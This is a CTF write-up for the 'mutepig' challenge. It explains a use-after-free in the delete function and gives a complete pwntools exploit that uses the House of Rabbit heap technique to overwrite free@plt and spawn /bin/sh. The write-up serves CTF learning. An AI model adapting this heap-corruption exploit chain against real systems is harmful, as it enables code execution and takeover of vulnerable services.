Introduction
This challenge seems to be the first seen House of Rabbit in CTF competition. This challenge follows the sample code given in [1]. More details on House of Rabbit are given in my previous post House-of-Rabbit.
Vulnerability Analysis
There exists a classical use-after-free vulnerability in the delete function. An entry is not removed from the list after free.
Exploit Plan
Since there is no any output function. We need to use House of Rabbit to overwrite function pointer at free@plt to 0x4006e0 and trigger system(“/bin/sh”) in the end.
Exploit
from pwn import * import time DEBUG = int(sys.argv[1]); if(DEBUG == 0): r = remote("1.2.3.4", 2333); elif(DEBUG == 1): r = process("./mutepig"); elif(DEBUG == 2): r = process("./mutepig"); gdb.attach(r, '''source ./script'''); #sizeoption: #1: fast (0x10) #2: small (0x80) #3: large (0xa00000) #13337: magic #else: nagative def create(sizeoption, payload): time.sleep(0.2); r.sendline("1"); r.sendline(str(sizeoption)); r.send(payload.ljust(7, '\x00')); def delete(index): time.sleep(0.2); r.sendline("2"); r.sendline(str(index)); def modify(index, payload1, payload2): time.sleep(0.2); r.sendline("3"); r.sendline(str(index)); r.send(payload1.ljust(0x7, '\x00')); r.send(payload2); def exploit(): create(3, "A"*4); #0 delete(0); create(3, "B"*4); #1 delete(1); create(1, "C"*4); #2 create(2, "D"*4); #3 delete(2); modify(2, p32(0x602130), p64(0) + p64(0x11) + p64(0) + p64(0xfffffffffffffff1)); delete(3); modify(3, "E"*4, p64(0xfffffffffffffff0) + p64(0x10) + p64(0x0) + p64(0xa00001)); create(3, "F"*4); modify(3, "G"*4, p64(0xfffffffffffffff0) + p64(0x10) + p64(0x0) + p64(0xfffffffffffffff1)); create(13337, "/bin/sh"); create(1, p32(0x602018)); #0 modify(0, p32(0x4006e0), p64(0)) modify(6, "/bin/sh", p64(0)); delete(6); r.interactive(); exploit();
Reference
[1] http://shift-crops.hatenablog.com/entry/2017/09/16/001126